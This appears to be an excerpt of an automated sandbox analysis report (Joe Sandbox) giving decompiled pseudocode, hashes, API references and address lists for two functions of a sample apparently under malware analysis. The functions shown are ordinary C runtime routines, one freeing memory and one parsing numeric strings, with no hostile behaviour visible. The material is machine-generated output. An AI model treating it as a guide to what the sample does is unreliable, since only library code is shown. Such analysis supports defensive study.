Opcode ID: 38d580e532ac5485af639cab600bc635fcff0ff817712ccf23b3796937884c5b
Instruction ID: 36bc7c08f5c47d36f5b67bc2907c27fd5e044b411746004ae6c785cd68790bbf
Opcode Fuzzy Hash: 38d580e532ac5485af639cab600bc635fcff0ff817712ccf23b3796937884c5b
Instruction Fuzzy Hash: 76A1B471D04209AADB14EFB5D9999FF7778AB04304F10443BE102B62C1DABD9EC9CA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0042D759 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042D759(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x44a700;
				if(_t68 != 0x44a700) {
					E0042E2C2(_t68);
					_t36 = _a4;
				}
				E0042E2C2( *((intOrPtr*)(_t36 + 0x3c)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x30)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x34)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x38)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x28)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x2c)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x40)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x44)));
				E0042E2C2( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E0042D323(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0042D38E(_t67, _t72, _t73, _t77);
			}

0x0042d759
0x0042d759
0x0042d759
0x0042d75e
0x0042d764
0x0042d766
0x0042d76c
0x0042d76f
0x0042d774
0x0042d777
0x0042d77b
0x0042d786
0x0042d791
0x0042d79c
0x0042d7a7
0x0042d7b2
0x0042d7bd
0x0042d7c8
0x0042d7d6
0x0042d7e1
0x0042d7e9
0x0042d7ea
0x0042d7ed
0x0042d7f3
0x0042d7f7
0x0042d7fb
0x0042d7fc
0x0042d806
0x0042d80c
0x0042d80d
0x0042d810
0x0042d816
0x0042d81a
0x0042d81e
0x0042d825

APIs

_free.LIBCMT ref: 0042D76F

Part of subcall function 0042E2C2: HeapFree.KERNEL32(00000000,00000000,?,0042B259), ref: 0042E2D8
Part of subcall function 0042E2C2: GetLastError.KERNEL32(?,?,0042B259), ref: 0042E2EA

_free.LIBCMT ref: 0042D77B
_free.LIBCMT ref: 0042D786
_free.LIBCMT ref: 0042D791
_free.LIBCMT ref: 0042D79C
_free.LIBCMT ref: 0042D7A7
_free.LIBCMT ref: 0042D7B2
_free.LIBCMT ref: 0042D7BD
_free.LIBCMT ref: 0042D7C8
_free.LIBCMT ref: 0042D7D6

Memory Dump Source

Source File: 00000001.00000002.259619952.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259607835.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259672292.0000000000449000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259798453.0000000000453000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259806258.0000000000454000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 89987fa146d0bdfd5684ae5ff871feb4d1956cc195097663308de64bd73669a4
Instruction ID: 1f46b96ba2bc5131e1e9948290b15f3112db4cd1f4055969a6dc7cc546576087
Opcode Fuzzy Hash: 89987fa146d0bdfd5684ae5ff871feb4d1956cc195097663308de64bd73669a4
Instruction Fuzzy Hash: 7421EA7AA00118EFCB01EF96D881CDE7BB8BF08744F4155AAF9099B121DB35DA44CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414701 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00414701(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed short* _v156;
				signed short* _v160;
				signed int _v164;
				intOrPtr _v168;
				signed short* _v172;
				char _v176;
				char _v188;
				signed short* _t176;
				signed int _t177;
				signed int _t178;
				signed short* _t179;
				signed int _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				void* _t187;
				signed char _t189;
				signed int _t193;
				signed int _t194;
				signed int _t196;
				void* _t199;
				intOrPtr _t200;
				signed int _t208;
				signed int _t209;
				signed short* _t211;
				signed int _t212;
				signed int _t214;
				intOrPtr _t219;
				void* _t220;
				signed short* _t221;
				signed int _t222;
				signed short* _t223;
				intOrPtr _t224;
				void* _t228;
				signed short* _t230;
				signed int _t232;
				signed short* _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed short* _t240;
				intOrPtr* _t244;
				signed short _t245;

				if(E00415291( &_a8) == 0) {
					L5:
					_t235 = 0;
					_t208 = 0;
					L6:
					_t244 = _a12;
					if(_t244 != 0) {
						 *_t244 = _a8;
					}
					return _t235;
				}
				_t209 = _a16;
				_t236 = 2;
				if(_t209 == 0) {
					L9:
					_t217 =  &_v188;
					E0041334C( &_v188, _t228, _a4);
					_v12 = 0;
					_v20 = 0;
					_t176 = _a8;
					_v172 = _t176;
					_t245 =  *_t176 & 0x0000ffff;
					_t177 =  &(_t176[1]);
					L11:
					_a8 = _t177;
					_t178 = E0042E35E(_t217, _t245, 8);
					_pop(_t217);
					__eflags = _t178;
					if(_t178 != 0) {
						_t179 = _a8;
						_t245 =  *_t179 & 0x0000ffff;
						_t177 = _t179 + _t236;
						__eflags = _t177;
						goto L11;
					}
					_t180 = _a20 & 0x000000ff;
					_v8 = _t180;
					__eflags = _t245 - 0x2d;
					if(_t245 != 0x2d) {
						__eflags = _t245 - 0x2b;
						if(_t245 != 0x2b) {
							_t230 = _a8;
							goto L17;
						}
						goto L15;
					} else {
						_v8 = _t180 | _t236;
						L15:
						_t234 = _a8;
						_t245 =  *_t234 & 0x0000ffff;
						_t230 = _t234 + _t236;
						_a8 = _t230;
						L17:
						_v16 = 0x3a;
						_t219 = 0xff10;
						_v148 = 0x66a;
						_v24 = 0x6f0;
						_v28 = 0x6fa;
						_v32 = 0x966;
						_v36 = 0x970;
						_v40 = 0x9e6;
						_v44 = 0x9f0;
						_v48 = 0xa66;
						_v52 = 0xa70;
						_v56 = 0xae6;
						_v60 = 0xaf0;
						_v64 = 0xb66;
						_v68 = 0xb70;
						_v72 = 0xc66;
						_v76 = 0xc70;
						_v80 = 0xce6;
						_v84 = 0xcf0;
						_v88 = 0xd66;
						_v92 = 0xd70;
						_v96 = 0xe50;
						_v100 = 0xe5a;
						_v104 = 0xed0;
						_v108 = 0xeda;
						_v112 = 0xf20;
						_v116 = 0xf2a;
						_v120 = 0x1040;
						_v124 = 0x104a;
						_v128 = 0x17e0;
						_v132 = 0x17ea;
						_v136 = 0x1810;
						_v140 = 0x181a;
						_v144 = 0xff1a;
						_t237 = 0x30;
						__eflags = _t209;
						if(_t209 == 0) {
							L19:
							__eflags = _t245 - _t237;
							if(_t245 < _t237) {
								L61:
								_t182 = _t245 & 0x0000ffff;
								__eflags = _t182 - 0x41;
								if(_t182 < 0x41) {
									L64:
									_t86 = _t182 - 0x61; // 0x5ff
									_t220 = _t86;
									__eflags = _t220 - 0x19;
									if(_t220 > 0x19) {
										_t183 = _t182 | 0xffffffff;
										__eflags = _t183;
										L69:
										__eflags = _t183;
										if(_t183 == 0) {
											_t184 =  *_t230 & 0x0000ffff;
											_t221 =  &(_t230[1]);
											_a8 = _t221;
											__eflags = _t184 - 0x78;
											if(_t184 == 0x78) {
												L77:
												__eflags = _t209;
												if(_t209 == 0) {
													_t209 = 0x10;
													_a16 = _t209;
												}
												_t245 =  *_t221 & 0x0000ffff;
												_t222 =  &(_t221[1]);
												__eflags = _t222;
												_a8 = _t222;
												L80:
												_t185 = _t209;
												asm("cdq");
												_push(_t209);
												_t223 = _t230;
												_v164 = _t209;
												_v160 = _t223;
												_t186 = E00445200(0xffffffff, 0xffffffff, _t185, _t223);
												_v152 = _t209;
												_v156 = _t223;
												_t211 = _t230;
												_t224 = _t186;
												_v16 = _t211;
												_v168 = _t224;
												while(1) {
													__eflags = _t245 - _t237;
													if(_t245 < _t237) {
														goto L122;
													}
													_t199 = 0x3a;
													__eflags = _t245 - _t199;
													if(_t245 >= _t199) {
														_t200 = 0xff10;
														__eflags = _t245 - 0xff10;
														if(_t245 >= 0xff10) {
															__eflags = _t245 - _v144;
															if(_t245 < _v144) {
																L87:
																_t239 = (_t245 & 0x0000ffff) - _t200;
																L121:
																__eflags = _t239 - 0xffffffff;
																if(_t239 != 0xffffffff) {
																	L130:
																	__eflags = _t239 - 0xffffffff;
																	if(_t239 == 0xffffffff) {
																		L144:
																		E00415248( &_a8, _t245);
																		_t189 = _v8;
																		__eflags = _t189 & 0x00000008;
																		if((_t189 & 0x00000008) != 0) {
																			_t208 = _v20;
																			_t235 = _v12;
																			__eflags = E00413BB7(_t189, _t235, _t208);
																			if(__eflags == 0) {
																				__eflags = _v8 & 0x00000002;
																				if((_v8 & 0x00000002) != 0) {
																					_t235 =  ~_t235;
																					asm("adc ebx, 0x0");
																					_t208 =  ~_t208;
																				}
																				L155:
																				__eflags = _v176;
																				if(_v176 != 0) {
																					 *(_v188 + 0x350) =  *(_v188 + 0x350) & 0xfffffffd;
																				}
																				goto L6;
																			}
																			 *((intOrPtr*)(E0042C135(__eflags))) = 0x22;
																			_t193 = _v8;
																			__eflags = _t193 & 0x00000001;
																			if((_t193 & 0x00000001) != 0) {
																				__eflags = _t193 & 0x00000002;
																				if((_t193 & 0x00000002) == 0) {
																					_t194 = _t193 | 0xffffffff;
																					__eflags = _t194;
																					_t208 = 0x7fffffff;
																				} else {
																					_t194 = 0;
																					_t208 = 0x80000000;
																				}
																				L152:
																				_t235 = _t194;
																				goto L155;
																			}
																			_t235 = _t235 | 0xffffffff;
																			_t208 = _t208 | 0xffffffff;
																			goto L155;
																		}
																		_a8 = _v172;
																		_t194 = 0;
																		_t208 = 0;
																		goto L152;
																	}
																	__eflags = _t239 - _a16;
																	if(_t239 >= _a16) {
																		goto L144;
																	}
																	_t196 = _v20;
																	_t232 = _v8 | 0x00000008;
																	__eflags = _t196 - _t211;
																	_v8 = _t232;
																	_t212 = _v12;
																	if(__eflags < 0) {
																		L141:
																		__eflags = 0;
																		L142:
																		_t214 = E004451C0(_v164, _v160, _t212, _t196) + _t239;
																		__eflags = _t214;
																		_v12 = _t214;
																		asm("adc eax, esi");
																		_v20 = _t232;
																		L143:
																		_t240 = _a8;
																		_t224 = _v168;
																		_t211 = _v16;
																		_t245 =  *_t240 & 0x0000ffff;
																		_a8 =  &(_t240[1]);
																		_t237 = 0x30;
																		continue;
																	}
																	if(__eflags > 0) {
																		L135:
																		__eflags = _t212 - _t224;
																		if(_t212 != _t224) {
																			L140:
																			_v8 = _t232 | 0x00000004;
																			goto L143;
																		}
																		__eflags = _t196 - _v16;
																		if(_t196 != _v16) {
																			goto L140;
																		}
																		__eflags = 0 - _v152;
																		if(__eflags < 0) {
																			goto L142;
																		}
																		if(__eflags > 0) {
																			goto L140;
																		}
																		__eflags = _t239 - _v156;
																		if(_t239 <= _v156) {
																			goto L142;
																		}
																		goto L140;
																	}
																	__eflags = _t212 - _t224;
																	if(_t212 < _t224) {
																		goto L141;
																	}
																	goto L135;
																}
																goto L122;
															}
															_t239 = _t237 | 0xffffffff;
															__eflags = _t239;
															goto L121;
														}
														_t200 = 0x660;
														__eflags = _t245 - 0x660;
														if(_t245 < 0x660) {
															goto L122;
														}
														__eflags = _t245 - _v148;
														if(_t245 >= _v148) {
															_t200 = _v24;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v28;
															if(_t245 < _v28) {
																goto L87;
															}
															_t200 = _v32;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v36;
															if(_t245 < _v36) {
																goto L87;
															}
															_t200 = _v40;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v44;
															if(_t245 < _v44) {
																goto L87;
															}
															_t200 = _v48;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v52;
															if(_t245 < _v52) {
																goto L87;
															}
															_t200 = _v56;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v60;
															if(_t245 < _v60) {
																goto L87;
															}
															_t200 = _v64;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v68;
															if(_t245 < _v68) {
																goto L87;
															}
															_t200 = _v72;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v76;
															if(_t245 < _v76) {
																goto L87;
															}
															_t200 = _v80;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v84;
															if(_t245 < _v84) {
																goto L87;
															}
															_t200 = _v88;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v92;
															if(_t245 < _v92) {
																goto L87;
															}
															_t200 = _v96;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v100;
															if(_t245 < _v100) {
																goto L87;
															}
															_t200 = _v104;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v108;
															if(_t245 < _v108) {
																goto L87;
															}
															_t200 = _v112;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v116;
															if(_t245 < _v116) {
																goto L87;
															}
															_t200 = _v120;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v124;
															if(_t245 < _v124) {
																goto L87;
															}
															_t200 = _v128;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v132;
															if(_t245 < _v132) {
																goto L87;
															}
															_t200 = _v136;
															__eflags = _t245 - _t200;
															if(_t245 < _t200) {
																goto L122;
															}
															__eflags = _t245 - _v140;
															if(_t245 >= _v140) {
																goto L122;
															}
														}
														goto L87;
													}
													_t239 = (_t245 & 0x0000ffff) - 0x30;
													goto L121;
													L122:
													_t238 = _t245 & 0x0000ffff;
													__eflags = _t238 - 0x41;
													if(_t238 < 0x41) {
														L125:
														_t133 = _t238 - 0x61; // -49
														_t187 = _t133;
														__eflags = _t187 - 0x19;
														if(_t187 > 0x19) {
															_t239 = _t238 | 0xffffffff;
															__eflags = _t239;
															goto L130;
														}
														L126:
														__eflags = _t187 - 0x19;
														if(_t187 <= 0x19) {
															_t238 = _t238 + 0xffffffe0;
															__eflags = _t238;
														}
														_t239 = _t238 + 0xffffffc9;
														goto L130;
													}
													__eflags = _t238 - 0x5a;
													if(_t238 > 0x5a) {
														goto L125;
													}
													_t132 = _t238 - 0x61; // -49
													_t187 = _t132;
													goto L126;
												}
											}
											__eflags = _t184 - 0x58;
											if(_t184 == 0x58) {
												goto L77;
											}
											__eflags = _t209;
											if(_t209 == 0) {
												_t209 = 8;
												_a16 = _t209;
											}
											E00415248( &_a8, _t184);
											goto L80;
										}
										__eflags = _t209;
										if(_t209 == 0) {
											_t209 = 0xa;
											_a16 = _t209;
										}
										goto L80;
									}
									L65:
									__eflags = _t220 - 0x19;
									if(_t220 <= 0x19) {
										_t182 = _t182 + 0xffffffe0;
										__eflags = _t182;
									}
									_t183 = _t182 + 0xffffffc9;
									goto L69;
								}
								__eflags = _t182 - 0x5a;
								if(_t182 > 0x5a) {
									goto L64;
								}
								_t85 = _t182 - 0x61; // 0x5ff
								_t220 = _t85;
								goto L65;
							}
							__eflags = _t245 - _v16;
							if(_t245 >= _v16) {
								__eflags = _t245 - _t219;
								if(_t245 >= _t219) {
									__eflags = _t245 - _v144;
									if(_t245 < _v144) {
										L28:
										_t183 = (_t245 & 0x0000ffff) - _t219;
										L60:
										__eflags = _t183 - 0xffffffff;
										if(_t183 != 0xffffffff) {
											goto L69;
										}
										goto L61;
									}
									_t183 = 0xffffffffffffffff;
									__eflags = 0xffffffffffffffff;
									goto L60;
								}
								__eflags = _t245 - 0x660;
								if(_t245 < 0x660) {
									goto L61;
								}
								__eflags = _t245 - _v148;
								if(_t245 >= _v148) {
									_t219 = _v24;
									__eflags = _t245 - _t219;
									if(_t245 < _t219) {
										goto L61;
									}
									__eflags = _t245 - _v28;
									if(_t245 >= _v28) {
										_t219 = _v32;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v36;
										if(_t245 < _v36) {
											goto L28;
										}
										_t219 = _v40;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v44;
										if(_t245 < _v44) {
											goto L28;
										}
										_t219 = _v48;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v52;
										if(_t245 < _v52) {
											goto L28;
										}
										_t219 = _v56;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v60;
										if(_t245 < _v60) {
											goto L28;
										}
										_t219 = _v64;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v68;
										if(_t245 < _v68) {
											goto L28;
										}
										_t219 = _v72;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v76;
										if(_t245 < _v76) {
											goto L28;
										}
										_t219 = _v80;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v84;
										if(_t245 < _v84) {
											goto L28;
										}
										_t219 = _v88;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v92;
										if(_t245 < _v92) {
											goto L28;
										}
										_t219 = _v96;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v100;
										if(_t245 < _v100) {
											goto L28;
										}
										_t219 = _v104;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v108;
										if(_t245 < _v108) {
											goto L28;
										}
										_t219 = _v112;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v116;
										if(_t245 < _v116) {
											goto L28;
										}
										_t219 = _v120;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v124;
										if(_t245 < _v124) {
											goto L28;
										}
										_t219 = _v128;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v132;
										if(_t245 < _v132) {
											goto L28;
										}
										_t219 = _v136;
										__eflags = _t245 - _t219;
										if(_t245 < _t219) {
											goto L61;
										}
										__eflags = _t245 - _v140;
										if(_t245 >= _v140) {
											goto L61;
										}
									}
									goto L28;
								}
								_t183 = (_t245 & 0x0000ffff) - 0x660;
								goto L60;
							}
							_t183 = (_t245 & 0x0000ffff) - _t237;
							goto L60;
						}
						__eflags = _t209 - 0x10;
						if(_t209 != 0x10) {
							goto L80;
						}
						goto L19;
					}
				}
				if(_t209 < _t236) {
					L4:
					 *((intOrPtr*)(E0042C135(_t253))) = 0x16;
					E0042C00E();
					goto L5;
				}
				_t253 = _t209 - 0x24;
				if(_t209 <= 0x24) {
					goto L9;
				}
				goto L4;
			}

0x00414719
0x0041473e
0x00414740
0x00414742
0x00414744
0x00414744
0x00414749
0x0041474e
0x0041474e
0x00414758
0x00414758
0x0041471b
0x00414720
0x00414723
0x00414759
0x0041475c
0x00414762
0x00414769
0x0041476c
0x0041476f
0x00414772
0x00414778
0x0041477b
0x00414788
0x0041478b
0x0041478e
0x00414794
0x00414795
0x00414797
0x00414780
0x00414783
0x00414786
0x00414786
0x00000000
0x00414786
0x00414799
0x0041479d
0x004147a0
0x004147a4
0x004147ad
0x004147b1
0x004147c0
0x00000000
0x004147c0
0x00000000
0x004147a6
0x004147a8
0x004147b3
0x004147b3
0x004147b6
0x004147b9
0x004147bb
0x004147c3
0x004147c3
0x004147ca
0x004147cf
0x004147de
0x004147e5
0x004147ec
0x004147f3
0x004147fa
0x00414801
0x00414808
0x0041480f
0x00414816
0x0041481d
0x00414824
0x0041482b
0x00414832
0x00414839
0x00414840
0x00414847
0x0041484e
0x00414855
0x0041485c
0x00414863
0x0041486a
0x00414871
0x00414878
0x0041487f
0x00414886
0x0041488d
0x00414894
0x0041489b
0x004148a2
0x004148ac
0x004148b6
0x004148c2
0x004148c3
0x004148c5
0x004148d0
0x004148d0
0x004148d3
0x00414a51
0x00414a51
0x00414a54
0x00414a57
0x00414a63
0x00414a63
0x00414a63
0x00414a66
0x00414a69
0x00414a78
0x00414a78
0x00414a7b
0x00414a7b
0x00414a7d
0x00414a8b
0x00414a8e
0x00414a91
0x00414a94
0x00414a97
0x00414ab3
0x00414ab3
0x00414ab5
0x00414ab9
0x00414aba
0x00414aba
0x00414abd
0x00414ac0
0x00414ac0
0x00414ac3
0x00414ac6
0x00414ac6
0x00414ac8
0x00414ac9
0x00414aca
0x00414acc
0x00414ad8
0x00414ade
0x00414ae3
0x00414aeb
0x00414af1
0x00414af3
0x00414af5
0x00414af8
0x00414afe
0x00414afe
0x00414b01
0x00000000
0x00000000
0x00414b09
0x00414b0a
0x00414b0d
0x00414b1a
0x00414b1f
0x00414b22
0x00414c6e
0x00414c75
0x00414b3f
0x00414b42
0x00414c7e
0x00414c7e
0x00414c81
0x00414cad
0x00414cad
0x00414cb0
0x00414d3f
0x00414d43
0x00414d48
0x00414d4b
0x00414d4d
0x00414d5e
0x00414d61
0x00414d6f
0x00414d71
0x00414da6
0x00414daa
0x00414dac
0x00414dae
0x00414db1
0x00414db1
0x00414db3
0x00414db3
0x00414dba
0x00414dc6
0x00414dc6
0x00000000
0x00414dba
0x00414d78
0x00414d7e
0x00414d81
0x00414d83
0x00414d8d
0x00414d8f
0x00414d9a
0x00414d9a
0x00414d9d
0x00414d91
0x00414d91
0x00414d93
0x00414d93
0x00414da2
0x00414da2
0x00000000
0x00414da2
0x00414d85
0x00414d88
0x00000000
0x00414d88
0x00414d55
0x00414d58
0x00414d5a
0x00000000
0x00414d5a
0x00414cb6
0x00414cb9
0x00000000
0x00000000
0x00414cc2
0x00414cc5
0x00414cc8
0x00414cca
0x00414ccd
0x00414cd0
0x00414cff
0x00414cff
0x00414d01
0x00414d18
0x00414d18
0x00414d1a
0x00414d1d
0x00414d1f
0x00414d22
0x00414d22
0x00414d25
0x00414d2b
0x00414d30
0x00414d36
0x00414d39
0x00000000
0x00414d39
0x00414cd2
0x00414cd8
0x00414cd8
0x00414cda
0x00414cf7
0x00414cfa
0x00000000
0x00414cfa
0x00414cdc
0x00414cdf
0x00000000
0x00000000
0x00414ce5
0x00414ceb
0x00000000
0x00000000
0x00414ced
0x00000000
0x00000000
0x00414cef
0x00414cf5
0x00000000
0x00000000
0x00000000
0x00414cf5
0x00414cd4
0x00414cd6
0x00000000
0x00000000
0x00000000
0x00414cd6
0x00000000
0x00414c81
0x00414c7b
0x00414c7b
0x00000000
0x00414c7b
0x00414b28
0x00414b2d
0x00414b30
0x00000000
0x00000000
0x00414b36
0x00414b3d
0x00414b49
0x00414b4c
0x00414b4f
0x00000000
0x00000000
0x00414b55
0x00414b59
0x00000000
0x00000000
0x00414b5b
0x00414b5e
0x00414b61
0x00000000
0x00000000
0x00414b67
0x00414b6b
0x00000000
0x00000000
0x00414b6d
0x00414b70
0x00414b73
0x00000000
0x00000000
0x00414b79
0x00414b7d
0x00000000
0x00000000
0x00414b7f
0x00414b82
0x00414b85
0x00000000
0x00000000
0x00414b8b
0x00414b8f
0x00000000
0x00000000
0x00414b91
0x00414b94
0x00414b97
0x00000000
0x00000000
0x00414b9d
0x00414ba1
0x00000000
0x00000000
0x00414ba3
0x00414ba6
0x00414ba9
0x00000000
0x00000000
0x00414baf
0x00414bb3
0x00000000
0x00000000
0x00414bb5
0x00414bb8
0x00414bbb
0x00000000
0x00000000
0x00414bc1
0x00414bc5
0x00000000
0x00000000
0x00414bcb
0x00414bce
0x00414bd1
0x00000000
0x00000000
0x00414bd7
0x00414bdb
0x00000000
0x00000000
0x00414be1
0x00414be4
0x00414be7
0x00000000
0x00000000
0x00414bed
0x00414bf1
0x00000000
0x00000000
0x00414bf7
0x00414bfa
0x00414bfd
0x00000000
0x00000000
0x00414c03
0x00414c07
0x00000000
0x00000000
0x00414c0d
0x00414c10
0x00414c13
0x00000000
0x00000000
0x00414c15
0x00414c19
0x00000000
0x00000000
0x00414c1f
0x00414c22
0x00414c25
0x00000000
0x00000000
0x00414c27
0x00414c2b
0x00000000
0x00000000
0x00414c31
0x00414c34
0x00414c37
0x00000000
0x00000000
0x00414c39
0x00414c3d
0x00000000
0x00000000
0x00414c43
0x00414c46
0x00414c49
0x00000000
0x00000000
0x00414c4b
0x00414c4f
0x00000000
0x00000000
0x00414c55
0x00414c5b
0x00414c5e
0x00000000
0x00000000
0x00414c60
0x00414c67
0x00000000
0x00000000
0x00414c69
0x00000000
0x00414b3d
0x00414b12
0x00000000
0x00414c83
0x00414c83
0x00414c86
0x00414c89
0x00414c95
0x00414c95
0x00414c95
0x00414c98
0x00414c9b
0x00414caa
0x00414caa
0x00000000
0x00414caa
0x00414c9d
0x00414c9d
0x00414ca0
0x00414ca2
0x00414ca2
0x00414ca2
0x00414ca5
0x00000000
0x00414ca5
0x00414c8b
0x00414c8e
0x00000000
0x00000000
0x00414c90
0x00414c90
0x00000000
0x00414c90
0x00414afe
0x00414a99
0x00414a9c
0x00000000
0x00000000
0x00414a9e
0x00414aa0
0x00414aa4
0x00414aa5
0x00414aa5
0x00414aac
0x00000000
0x00414aac
0x00414a7f
0x00414a81
0x00414a85
0x00414a86
0x00414a86
0x00000000
0x00414a81
0x00414a6b
0x00414a6b
0x00414a6e
0x00414a70
0x00414a70
0x00414a70
0x00414a73
0x00000000
0x00414a73
0x00414a59
0x00414a5c
0x00000000
0x00000000
0x00414a5e
0x00414a5e
0x00000000
0x00414a5e
0x004148d9
0x004148dd
0x004148e9
0x004148ec
0x00414a3c
0x00414a43
0x00414923
0x00414926
0x00414a4c
0x00414a4c
0x00414a4f
0x00000000
0x00000000
0x00000000
0x00414a4f
0x00414a49
0x00414a49
0x00000000
0x00414a49
0x004148f2
0x004148f5
0x00000000
0x00000000
0x004148fb
0x00414902
0x00414911
0x00414914
0x00414917
0x00000000
0x00000000
0x0041491d
0x00414921
0x0041492d
0x00414930
0x00414933
0x00000000
0x00000000
0x00414939
0x0041493d
0x00000000
0x00000000
0x0041493f
0x00414942
0x00414945
0x00000000
0x00000000
0x0041494b
0x0041494f
0x00000000
0x00000000
0x00414951
0x00414954
0x00414957
0x00000000
0x00000000
0x0041495d
0x00414961
0x00000000
0x00000000
0x00414963
0x00414966
0x00414969
0x00000000
0x00000000
0x0041496f
0x00414973
0x00000000
0x00000000
0x00414975
0x00414978
0x0041497b
0x00000000
0x00000000
0x00414981
0x00414985
0x00000000
0x00000000
0x00414987
0x0041498a
0x0041498d
0x00000000
0x00000000
0x00414993
0x00414997
0x00000000
0x00000000
0x00414999
0x0041499c
0x0041499f
0x00000000
0x00000000
0x004149a5
0x004149a9
0x00000000
0x00000000
0x004149af
0x004149b2
0x004149b5
0x00000000
0x00000000
0x004149bb
0x004149bf
0x00000000
0x00000000
0x004149c5
0x004149c8
0x004149cb
0x00000000
0x00000000
0x004149d1
0x004149d5
0x00000000
0x00000000
0x004149db
0x004149de
0x004149e1
0x00000000
0x00000000
0x004149e3
0x004149e7
0x00000000
0x00000000
0x004149ed
0x004149f0
0x004149f3
0x00000000
